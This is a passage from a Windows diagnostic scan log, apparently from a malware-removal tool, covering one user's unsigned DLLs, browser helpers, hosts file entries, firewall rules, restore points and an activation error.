2020-10-05 22:07 - 2015-06-10 10:16 - 000084992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5MultimediaWidgets.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000849408 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Network.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000266240 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5OpenGL.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000155648 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Positioning.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000262144 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5PrintSupport.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 002522624 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Qml.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 002236928 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Quick.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000143872 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Sensors.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000056320 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5SerialPort.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000152576 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Sql.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000203776 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Svg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000118784 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Test.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 017492992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5WebKit.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000193536 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5WebKitWidgets.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004372992 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Widgets.dll
2016-05-04 19:08 - 2015-12-31 16:15 - 000077312 _____ (Igor Pavlov) [File not signed] D:\Programy\7-Zip\7-zip.dll
2017-09-28 19:41 - 2017-09-28 19:41 - 000266240 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2017-12-11 22:18 - 2015-02-27 11:35 - 000489984 _____ (Newtonsoft) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\Newtonsoft.Json.dll
2020-10-05 22:07 - 2020-04-20 15:19 - 002649600 _____ (Python Software Foundation) [File not signed] C:\Users\Tomika\.odrive\bin\6729\python27.dll
2020-10-05 22:07 - 2016-06-27 17:25 - 003395072 _____ (Python Software Foundation) [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\PYTHON27.DLL
2019-11-02 12:44 - 2019-11-02 12:44 - 000547840 _____ (The Chromium Authors) [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\chrome_elf.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 023507968 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icudt52.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 001798656 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icuin52.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 001304064 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icuuc52.dll
2017-12-11 22:18 - 2017-03-01 11:30 - 000087040 _____ (Wondershare) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppCollect.dll
2017-12-11 22:18 - 2017-03-01 11:30 - 000197632 _____ (Wondershare) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppCommon.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\Tomika\AppData\Local\Temp:com.affinity.publisher.1 [241]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2020-08-12] (Microsoft Corporation -> Microsoft Corporation)
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-20] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre-10.0.1\bin\jp2ssv.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2020-08-12] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2013-08-22 15:25 - 2020-03-13 10:57 - 000001256 _____ C:\Windows\system32\drivers\etc\hosts
109.94.209.70 fitgirlrepacks.co # Fake FitGirl site
109.94.209.70 fitgirl-repacks.cc # Fake FitGirl site
109.94.209.70 fitgirl-repack.com # Fake FitGirl site
109.94.209.70 www.fitgirlrepacks.co # Fake FitGirl site
109.94.209.70 www.fitgirl-repacks.cc # Fake FitGirl site
109.94.209.70 www.fitgirl-repack.com # Fake FitGirl site
2016-05-06 18:24 - 2016-06-16 16:34 - 000000511 _____ C:\Windows\system32\drivers\etc\hosts.ics
5 13 16 50 17 837
192.168.137.1 Tom.mshome.net # 2021 5 3 5 21 35 24 561
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Python37-32\Scripts\;C:\Program Files (x86)\Python37-32\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Windows\Microsoft.NET\Framework\v2.0.50727;D:\Programy\LLVM\bin;C:\Program Files\dotnet\;C:\Program Files\Git\cmd;C:\Program Files (x86)\Mitov\Visuino
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.81.1 - 213.46.172.38
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
Network Binding:
=============
Ethernet: Npcap Packet Driver (NPCAP) -> insecure_npcap (enabled)
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "Adobe ARM"
HKLM\...\StartupApproved\Run32: => "ADSKAppManager"
HKLM\...\StartupApproved\Run32: => "SwitchBoard"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [TCP Query User{9AD01E6D-EDE0-4C26-8794-C1ACDF29844C}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [UDP Query User{A737DDAD-B775-42F7-969B-B54749BB548F}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [{C0BFCA61-6769-4387-99FB-313A10D98354}] => (Allow) LPort=1542
FirewallRules: [{F504ABC0-A8FD-4D88-872C-BFB0357F7DDB}] => (Allow) LPort=1542
FirewallRules: [{1F8EB603-5FF8-4688-8E08-79E2DA138F65}] => (Allow) LPort=53
FirewallRules: [TCP Query User{3462722B-DE6F-4647-9F68-0E5009544BFA}D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe] => (Allow) D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe () [File not signed]
FirewallRules: [UDP Query User{2CF8A8C3-A1C3-4199-99CC-D51EB01C5B64}D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe] => (Allow) D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe () [File not signed]
FirewallRules: [{9CADBC3E-64E4-40F6-A8F6-C6D24135B717}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{79C6053B-6247-46D6-8E3B-B95FBFDE571A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{18774EFC-EDAD-4F19-BCE4-BA023A4A898E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{1F714EF3-F860-426A-A9EC-0A32EDC7BC3A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{40D21C12-D563-4D39-B50E-056DD7852CFD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{EB44BCFA-7554-4888-93B9-456144AA6ED0}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\UPlayBrowser.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{440F975A-77E6-4DC1-857F-5D47B5EF6175}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\UPlayBrowser.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{3B0A6297-0985-4D08-8FD1-99DB730EFBBD}] => (Allow) D:\Programy\steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{E318FA87-164F-4371-9CD7-830A02EA7E57}] => (Allow) D:\Programy\steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{8085AEA6-DBC3-4EDC-8B9C-6C73487D5161}] => (Allow) D:\Programy\steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{710EA0F8-1658-43F9-8E62-A185324EE35E}] => (Allow) D:\Programy\steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{84F54D52-BF8C-4DE7-B761-67F42861E894}] => (Allow) D:\Programy\wolfram mathematica 11\Mathematica.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{DAB6E844-69B2-4A0D-B4D7-FEA33AE13AA0}] => (Allow) D:\Programy\wolfram mathematica 11\Mathematica.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{52570D7A-3FDB-47AC-96E1-1CD4749A6AC5}] => (Allow) D:\Programy\wolfram mathematica 11\MathKernel.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{72C16DE6-5F6E-4C7A-A05A-D8E6CA5BDD48}] => (Allow) D:\Programy\wolfram mathematica 11\MathKernel.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{64C1867B-06C3-4F4D-BFEE-BFD5E8FD454A}] => (Allow) D:\Programy\wolfram mathematica 11\math.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{536FD2FD-654E-4B01-BA28-18CAB6CC6173}] => (Allow) D:\Programy\wolfram mathematica 11\math.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{86092937-B01E-44C7-98CA-78F067D83097}] => (Allow) D:\Programy\PotPlayer\PotPlayerMini64.exe (Kakao corp. -> Kakao)
FirewallRules: [{D822C388-756D-419B-A32F-077778123373}] => (Allow) D:\Programy\PotPlayer\PotPlayerMini64.exe (Kakao corp. -> Kakao)
FirewallRules: [{9483F894-9CD7-40D9-97A4-9A254B38B2E2}] => (Allow) D:\Programy\Mr DJ\Call of Duty 2\CoD2SP_s.exe () [File not signed]
FirewallRules: [{4B073B04-BB23-4AF4-9D01-18F6A857C5A5}] => (Allow) D:\Programy\Mr DJ\Call of Duty 2\CoD2SP_s.exe () [File not signed]
FirewallRules: [{3F5D3EC2-8C07-48A9-A1E7-549AA8E798EF}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\AssassinsCreedIIGame.exe (Ubisoft Entertainment -> )
FirewallRules: [{DC89694B-B938-4F52-AE55-815B8176FEF1}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\AssassinsCreedIIGame.exe (Ubisoft Entertainment -> )
FirewallRules: [{45D9FC93-D3D0-492B-8F49-63DB88E81B86}] => (Allow) D:\Programy\steam\steamapps\common\Alien Swarm Reactive Drop\reactivedrop.exe () [File not signed]
FirewallRules: [{D2F17CF0-FBCA-441F-8FDE-A97D1AFED72C}] => (Allow) D:\Programy\steam\steamapps\common\Alien Swarm Reactive Drop\reactivedrop.exe () [File not signed]
FirewallRules: [{1A7722A8-6C68-4E08-9654-EE38A7DE4A6C}] => (Allow) D:\Programy\steam\steamapps\common\Torchlight II\ModLauncher.exe (Runic Games, Inc. -> Runic Games, Inc.)
FirewallRules: [{1B1A54D2-02ED-4791-BF2F-EDD3B463C46E}] => (Allow) D:\Programy\steam\steamapps\common\Torchlight II\ModLauncher.exe (Runic Games, Inc. -> Runic Games, Inc.)
FirewallRules: [{C42697B3-7F4A-437C-B4B8-74107E0DFCD7}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{90D1047B-2E4D-46BB-B7E8-DF05DF213F14}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{0175C92F-A1AD-4D10-8E4C-CF3D2DD72C44}] => (Allow) D:\Programy\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{58B05CB9-C375-4D64-8906-28E5F17E4EE8}] => (Allow) D:\Programy\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{C967F151-1891-4F21-86EB-ECF7811CD148}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{DE3B2D5D-EBE7-4127-8B80-E91C3EA67D63}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{526DDF0E-F163-44E3-8E56-F8608F65A9F8}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{769336BD-9379-4490-8F9F-E9FA1CC2DCAB}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [TCP Query User{58028633-BF2A-440C-A580-BF4C8A4AA820}D:\download\download_torrenty\foundation.v1.0.15\foundation.exe] => (Allow) D:\download\download_torrenty\foundation.v1.0.15\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [UDP Query User{2A70850E-96CF-47FB-9C90-E3E834183FC8}D:\download\download_torrenty\foundation.v1.0.15\foundation.exe] => (Allow) D:\download\download_torrenty\foundation.v1.0.15\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [{DF3AB8C6-D5A5-4D24-B8B9-3638A08EC446}] => (Allow) D:\Programy\Davinci\Resolve.exe (Blackmagic Design Pty Ltd -> Blackmagic Design Pty. Ltd.)
FirewallRules: [{90E1D846-5A9C-4EC5-A6B7-586E01CFF434}] => (Allow) D:\Programy\Davinci\bmdpaneld.exe () [File not signed]
FirewallRules: [{D761FCC8-0F10-4D82-BE98-4050364F04A5}] => (Allow) D:\Programy\Davinci\DaVinciPanelDaemon.exe () [File not signed]
FirewallRules: [{76BFF8C8-BF48-47CB-ABA4-B5E82F0092F1}] => (Allow) D:\Programy\Davinci\JLCooperPanelDaemon.exe () [File not signed]
FirewallRules: [{3B3E0F92-9C5A-4438-BE0E-F5270535AE28}] => (Allow) D:\Programy\Davinci\EuphonixPanelDaemon.exe () [File not signed]
FirewallRules: [{6EFDD34F-0329-4EFC-95E8-FC81B0AC31E6}] => (Allow) D:\Programy\Davinci\TangentPanelDaemon.exe () [File not signed]
FirewallRules: [{6E00C352-B8B4-4A2F-8CDF-D1F3527383C5}] => (Allow) D:\Programy\Davinci\DPDecoder.exe (Blackmagic Design Pty Ltd -> )
FirewallRules: [TCP Query User{455134ED-7753-4DAA-9476-D27AC787F88F}D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe] => (Block) D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{D44AE864-5838-42D9-83BA-8489DF255FC8}D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe] => (Block) D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{9219AFA1-328C-4A5F-940B-2B4CEDB13268}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{9593C68A-1FB3-401D-B3D1-94DE01DC259D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{AC130793-2F89-41A6-8F71-BD60903E5296}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{278E464D-115C-4F75-8C47-85993E13BF84}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{FFC2B8AE-1939-4CCB-BEBF-9F490C9824FD}] => (Allow) D:\Games\Nuked Cockroach Launcher\Nuked_Cockroach_Launcher.exe (XSOLLA) [File not signed]
FirewallRules: [{9ED468EA-581E-4246-B93F-5916686EA2D8}] => (Allow) D:\Games\Nuked Cockroach Launcher\Nuked_Cockroach_Launcher.exe (XSOLLA) [File not signed]
FirewallRules: [TCP Query User{C739BBFF-E446-45DB-944D-7B4F5076D9A2}D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe] => (Allow) D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe () [File not signed]
FirewallRules: [UDP Query User{A8866385-5792-4382-BC8A-D85DF28E84FE}D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe] => (Allow) D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe () [File not signed]
FirewallRules: [TCP Query User{7DD8787E-C39E-492D-B408-1EBE71BA1033}D:\games\nuked cockroach launcher\launcher.exe] => (Allow) D:\games\nuked cockroach launcher\launcher.exe (XSOLLA) [File not signed]
FirewallRules: [UDP Query User{19498341-E34B-4AD7-8763-750721C1E717}D:\games\nuked cockroach launcher\launcher.exe] => (Allow) D:\games\nuked cockroach launcher\launcher.exe (XSOLLA) [File not signed]
FirewallRules: [TCP Query User{40725FB9-3F90-459F-AFCB-8F49624A8371}D:\programy\arduino\java\bin\javaw.exe] => (Allow) D:\programy\arduino\java\bin\javaw.exe
FirewallRules: [UDP Query User{B96FE167-8E44-4F35-8659-15B21539D00D}D:\programy\arduino\java\bin\javaw.exe] => (Allow) D:\programy\arduino\java\bin\javaw.exe
FirewallRules: [{B6609402-D440-46AB-A838-3492539975C8}] => (Allow) D:\Programy\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{973AD33C-750E-4AEF-9E33-45E7C1B41823}] => (Allow) D:\Programy\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{253B106F-1C56-48CB-B28D-46DB43BEB0D9}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
FirewallRules: [{851ADD7C-BEDD-4C11-BE3E-59E9697058C5}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
FirewallRules: [{6D8B4E9E-398F-4BE6-8191-6236039CD875}] => (Allow) D:\Programy\steam\steamapps\common\Lara Croft and the Temple of Osiris\LC2.exe (Square Enix Ltd.) [File not signed]
FirewallRules: [{2A4160D9-8A8D-4D49-8EC2-5799EEC41DFE}] => (Allow) D:\Programy\steam\steamapps\common\Lara Croft and the Temple of Osiris\LC2.exe (Square Enix Ltd.) [File not signed]
FirewallRules: [TCP Query User{B0830E4B-499A-46AD-B5EB-4630A4AE2BBF}C:\users\tomika\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\tomika\appdata\local\gamecenter\gamecenter.exe (Mail.Ru LLC -> )
FirewallRules: [UDP Query User{43CBB4F4-2E71-41CE-B0CA-F8EAE8F74F09}C:\users\tomika\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\tomika\appdata\local\gamecenter\gamecenter.exe (Mail.Ru LLC -> )
FirewallRules: [TCP Query User{816B0942-C37F-4F80-BEA2-7E3C90414862}D:\mygames\warface my.com\bin64release\game.exe] => (Allow) D:\mygames\warface my.com\bin64release\game.exe (warface -> Crytek GmbH)
FirewallRules: [UDP Query User{D031D023-83AB-49B8-8086-1452092B4A60}D:\mygames\warface my.com\bin64release\game.exe] => (Allow) D:\mygames\warface my.com\bin64release\game.exe (warface -> Crytek GmbH)
FirewallRules: [TCP Query User{7CB2C87F-404A-41EF-9381-B51BD7A9AD61}D:\games\desperados 3\desperados iii.exe] => (Allow) D:\games\desperados 3\desperados iii.exe () [File not signed]
FirewallRules: [UDP Query User{B0E49713-2170-4625-8CE7-1947CF2445D5}D:\games\desperados 3\desperados iii.exe] => (Allow) D:\games\desperados 3\desperados iii.exe () [File not signed]
FirewallRules: [TCP Query User{9A5A2BD0-35C2-4DDF-A5C6-E6DBC6D64655}D:\download\anydesk.exe] => (Allow) D:\download\anydesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [UDP Query User{149E8202-B5BE-4B0F-BF46-CC86E6625851}D:\download\anydesk.exe] => (Allow) D:\download\anydesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{CDCDCA1D-A959-4A82-A5F8-0C2C67C2C231}] => (Allow) D:\Programy\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{1BD88D15-D993-4345-BF4F-535DEE0A908E}] => (Allow) D:\Programy\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A925788E-9D19-4369-88A0-D0FA8376AE79}] => (Allow) D:\Programy\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{1F853AED-4107-4F14-BDDF-ED58CB05BDC3}] => (Allow) D:\Programy\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{06D1F245-05F2-409F-A4BE-9837E07CD260}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{2569DC12-C2E2-4F91-88CA-7632295A63DE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{1A2359B7-F628-4318-A8B1-6AD77A67BCAA}D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe] => (Allow) D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe (KRAFTON, Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{4D399D8C-48FA-4BA2-8612-E595A8C33A6E}D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe] => (Allow) D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe (KRAFTON, Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{984671D7-51AF-4F30-BF3B-8DE783B344B9}D:\games\wasteland 3\wl3.exe] => (Block) D:\games\wasteland 3\wl3.exe () [File not signed]
FirewallRules: [UDP Query User{4544E668-7F0F-4E2B-A3E8-5825E1798ABB}D:\games\wasteland 3\wl3.exe] => (Block) D:\games\wasteland 3\wl3.exe () [File not signed]
FirewallRules: [{406231D4-1E8F-4951-A3F0-C9DE3789D466}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
03-10-2020 13:33:03 Scheduled Checkpoint
09-10-2020 19:32:01 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660
09-10-2020 19:32:10 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40649
13-10-2020 20:26:05 Windows Update
22-10-2020 20:30:31 Scheduled Checkpoint
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (10/23/2020 08:29:14 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
